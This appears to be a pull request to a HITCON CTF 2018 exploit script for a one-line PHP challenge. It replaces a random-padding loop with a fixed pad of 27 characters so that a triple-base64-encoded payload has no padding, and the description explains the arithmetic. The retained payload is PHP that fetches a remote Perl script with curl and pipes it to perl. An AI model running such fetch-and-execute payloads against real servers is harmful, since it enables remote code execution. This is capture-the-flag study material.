### PR TITLE
Fix payload padding to avoid loop

### DIFF
--- a/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py
+++ b/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py
@@ -16,17 +16,9 @@ headers = {
 }
 
 payload = '@<?php `curl orange.tw/w/bc.pl|perl -`;?>'
-
-
-while 1:
-    junk = ''.join(sample(string.ascii_letters, randint(8, 16)))
-    x = b64encode(payload + junk)
-    xx = b64encode(b64encode(payload + junk))
-    xxx = b64encode(b64encode(b64encode(payload + junk)))
-    if '=' not in x and '=' not in xx and '=' not in xxx:
-        payload = xxx
-        print payload
-        break
+payload += 'a' * (27 - len(payload) % 27)
+payload = b64encode(b64encode(b64encode(payload)))
+print payload
 
 def runner1(i):
     data = {


### PR DESCRIPTION
Hey,

Thanks for the awesome challenge (and the solving script)! I would like to make a friendly contribution :)

In order to avoid padding for a single base64 encoding, we need the length l of our initial message to be a multiple of 3, as three 8-bit characters are encoded as exactly four 6-bit/base64 characters.

The length of the resulting message will be l × 4 / 3, since three characters are encoded into four.
len(x) = l × 4 / 3
len(xx) = l × 4 / 3 × 4 / 3
len(xxx) = l × 4 / 3 × 4 / 3 × 4 / 3

For xxx to not contain padding, we need len(xx) to be a multiple of 3; same reasoning for len(xx), for which you need len(x) to be a multiple of 3, and len(x) for which you need l to be a multiple of 3.

Since 3 and 4 are coprime, we can sort of remove the 4 from the equations for our reasoning.
Hence, we need:
l % 3 == 0 && len(x) % 3 == 0 && len(xx) % 3 == 0
<=> l % 3 == 0 && l / 3 % 3 == 0 && l / 3 / 3 % 3 == 0
<=> l % 3^3 == 0
<=> l % 27 == 0

Sorry for the long-winded (possibly unneeded?) explanation!